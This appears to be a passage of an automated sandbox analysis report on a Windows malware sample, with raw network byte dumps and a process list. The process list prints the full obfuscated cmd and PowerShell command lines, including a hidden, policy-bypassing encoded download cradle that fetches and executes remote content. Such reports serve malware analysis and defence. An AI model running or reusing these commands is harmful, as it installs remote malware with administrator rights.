T[[V[b[.Zs[^8T[[V[b[.Zs[^T[[V[b[.Zs[^T[[VZ[b[.Zs[^pT[[V[b[.Z1s[^@T[[V[b[.Z
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: 13 d6 5e d0 55 fd 5b 13 d0 5b 13 d6 56 22 d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 71 90 73 5b 13 d6 5e 28 55 fd 5b 13 d0 5b 13 d6 56 2a d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 51 90 73 5b 13 d6 5e 20 55 fd 5b 13 d0 5b 13 d6 56 2a d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 b1 91 73 5b 13 d6 5e 38 55 fd 5b 13 d0 5b 13 d6 56 3a d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 91 91 73 5b 13 d6 5e 38 55 fd 5b 13 d0 5b 13 d6 56 1a d8 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f1 91 73 5b 13 d6 5e 10 55 fd 5b 13 d0 5b 13 d6 56 72 d8 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 d1 91 73 5b 13 d6 5e 68 55 fd 5b 13 d0 5b 13 d6 56 4a d8 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 31 91 73 5b 13 d6 5e 40 55 fd 5b 13 d0 5b 13 d6 56 a2 d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 11 91 73 Data Ascii: ^U[[V"[b[.Zqs[^(U[[V[b[.ZQs[^ U[[V[b[.Zs[^8U[[V:[b[.Zs[^8U[[V[b[.Zs[^U[[Vr[b[.Zs[^hU[[VJ[b[.Z1s[^@U[[V[b[.Zs
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: d0 8b b2 b1 9e 73 5b 13 d6 5e 80 50 fd 5b 13 d0 5b 13 d6 56 f2 db 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 91 9e 73 5b 13 d6 5e 90 50 fd 5b 13 d0 5b 13 d6 56 ca db 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f1 9e 73 5b 13 d6 5e e8 50 fd 5b 13 d0 5b 13 d6 56 22 db 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 d1 9e 73 5b 13 d6 5e c0 50 fd 5b 13 d0 5b 13 d6 56 3a db 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 31 9e 73 5b 13 d6 5e d8 50 fd 5b 13 d0 5b 13 d6 56 12 db 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 11 9e 73 5b 13 d6 5e 30 50 fd 5b 13 d0 5b 13 d6 56 6a db 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 71 9e 73 5b 13 d6 5e 38 50 fd 5b 13 d0 5b 13 d6 56 6a db 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 51 9e 73 5b 13 d6 5e 10 50 fd 5b 13 d0 5b 13 d6 56 42 db 03 5b 13 d8 62 5b 2e 5a 98 Data Ascii: s[^P[[V[b[.Zs[^P[[V[b[.Zs[^P[[V"[b[.Zs[^P[[V:[b[.Z1s[^P[[V[b[.Zs[^0P[[Vj[b[.Zqs[^8P[[Vj[b[.ZQs[^P[[VB[b[.Z
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: d8 62 5b 2e 5a 98 13 d0 8b b2 d1 9b 73 5b 13 d6 5e 70 52 fd 5b 13 d0 5b 13 d6 56 f2 25 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 31 9b 73 5b 13 d6 5e 78 52 fd 5b 13 d0 5b 13 d6 56 ea 25 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 11 9b 73 5b 13 d6 5e 50 52 fd 5b 13 d0 5b 13 d6 56 e2 25 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 71 9b 73 5b 13 d6 5e a8 53 fd 5b 13 d0 5b 13 d6 56 ea 25 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 51 9b 73 5b 13 d6 5e 80 53 fd 5b 13 d0 5b 13 d6 56 c2 25 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 b1 e4 73 5b 13 d6 5e 98 53 fd 5b 13 d0 5b 13 d6 56 ca 25 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 91 e4 73 5b 13 d6 5e e8 53 fd 5b 13 d0 5b 13 d6 56 22 25 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f1 e4 73 5b 13 d6 5e e8 53 fd 5b 13 d0 5b 13 d6 56 fa 25 03 5b Data Ascii: b[.Zs[^pR[[V%[b[.Z1s[^xR[[V%[b[.Zs[^PR[[V%[b[.Zqs[^S[[V%[b[.ZQs[^S[[V%[b[.Zs[^S[[V%[b[.Zs[^S[[V"%[b[.Zs[^S[[V%[
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: d6 56 9a 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 71 e0 73 5b 13 d6 5e 78 5d fd 5b 13 d0 5b 13 d6 56 8a 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 51 e0 73 5b 13 d6 5e 78 5d fd 5b 13 d0 5b 13 d6 56 9a 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 b1 e1 73 5b 13 d6 5e 48 5d fd 5b 13 d0 5b 13 d6 56 f2 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 91 e1 73 5b 13 d6 5e 58 5d fd 5b 13 d0 5b 13 d6 56 ca 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f1 e1 73 5b 13 d6 5e 58 5d fd 5b 13 d0 5b 13 d6 56 d2 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 d1 e1 73 5b 13 d6 5e b0 5e fd 5b 13 d0 5b 13 d6 56 2a 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 31 e1 73 5b 13 d6 5e 88 5e fd 5b 13 d0 5b 13 d6 56 02 27 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 11 e1 73 5b 13 d6 5e 90 5e fd 5b 13 d0 5b Data Ascii: V'[b[.Zqs[^x][[V'[b[.ZQs[^x][[V'[b[.Zs[^H][[V'[b[.Zs[^X][[V'[b[.Zs[^X][[V'[b[.Zs[^^[[V*'[b[.Z1s[^^[[V'[b[.Zs[^^[[
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: 5e fd 5b 13 d0 5b 13 d6 56 da 22 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 91 ee 73 5b 13 d6 5e 78 5e fd 5b 13 d0 5b 13 d6 56 32 22 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f1 ee 73 5b 13 d6 5e 48 5e fd 5b 13 d0 5b 13 d6 56 0a 22 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 d1 ee 73 5b 13 d6 5e 58 5e fd 5b 13 d0 5b 13 d6 56 62 22 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 31 ee 73 5b 13 d6 5e b0 5f fd 5b 13 d0 5b 13 d6 56 7a 22 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 11 ee 73 5b 13 d6 5e 88 5f fd 5b 13 d0 5b 13 d6 56 52 22 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 71 ee 73 5b 13 d6 5e e0 5f fd 5b 13 d0 5b 13 d6 56 aa 23 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 51 ee 73 5b 13 d6 5e f8 5f fd 5b 13 d0 5b 13 d6 56 82 23 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 b1 ef 73 5b 13 d6 5e Data Ascii: ^[[V"[b[.Zs[^x^[[V2"[b[.Zs[^H^[[V"[b[.Zs[^X^[[Vb"[b[.Z1s[^_[[Vz"[b[.Zs[^_[[VR"[b[.Zqs[^_[[V#[b[.ZQs[^_[[V#[b[.Zs[^

Target ID:	0
Start time:	19:00:41
Start date:	14/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /v /k "St^art /mIn "" pow^er^S^H^Ell -n^Ol^o^go -NO^P -e^p B^y^P^ass -EN^CO^De^d^cOM^MA^nd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEcAOABBAFoAQQBCAEoAQQBFADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcANABBAFkAZwBCAFkAQQBGAEkAQQBhAEEAQgBhAEEARABJAEEAVgBnAEIAMQBBAEYAawBBAE0AdwBCAHIAQQBIAFUAQQBZAGcAQQB5AEEARABVAEEAYwB3AEIAaABBAEYAYwBBAE4AUQBCAHMAQQBFAHcAQQBlAGcAQgBDAEEARQBVAEEAWQBRAEEAegBBAEcAOABBAE0AdwBCAGkAQQBHAGMAQQBQAFEAQQA5AEEAQwBJAEEASwBRAEEAcABBAEMAawBBAEsAUQBBAHUAQQBFAE0AQQBUAHcAQgBPAEEASABRAEEAWgBRAEIATwBBAEgAUQBBAEsAUQBBAHAAQQBBAD0APQAiAA=="" && exit
Imagebase:	0x7ff6b2830000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	19:00:42
Start date:	14/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powerSHEll -nOlogo -NOP -ep ByPass -ENCODedcOMMAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEcAOABBAFoAQQBCAEoAQQBFADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcANABBAFkAZwBCAFkAQQBGAEkAQQBhAEEAQgBhAEEARABJAEEAVgBnAEIAMQBBAEYAawBBAE0AdwBCAHIAQQBIAFUAQQBZAGcAQQB5AEEARABVAEEAYwB3AEIAaABBAEYAYwBBAE4AUQBCAHMAQQBFAHcAQQBlAGcAQgBDAEEARQBVAEEAWQBRAEEAegBBAEcAOABBAE0AdwBCAGkAQQBHAGMAQQBQAFEAQQA5AEEAQwBJAEEASwBRAEEAcABBAEMAawBBAEsAUQBBAHUAQQBFAE0AQQBUAHcAQgBPAEEASABRAEEAWgBRAEIATwBBAEgAUQBBAEsAUQBBAHAAQQBBAD0APQAiAA=="
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	19:00:44
Start date:	14/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUATgBDAG8AZABJAE4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AG4AYgBYAFIAaABaADIAVgB1AFkAMwBrAHUAYgAyADUAcwBhAFcANQBsAEwAegBCAEUAYQAzAG8AMwBiAGcAPQA9ACIAKQApACkAKQAuAEMATwBOAHQAZQBOAHQAKQApAA==
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	19:00:47
Start date:	14/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lsozgnau\lsozgnau.cmdline"
Imagebase:	0x7ff763d60000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true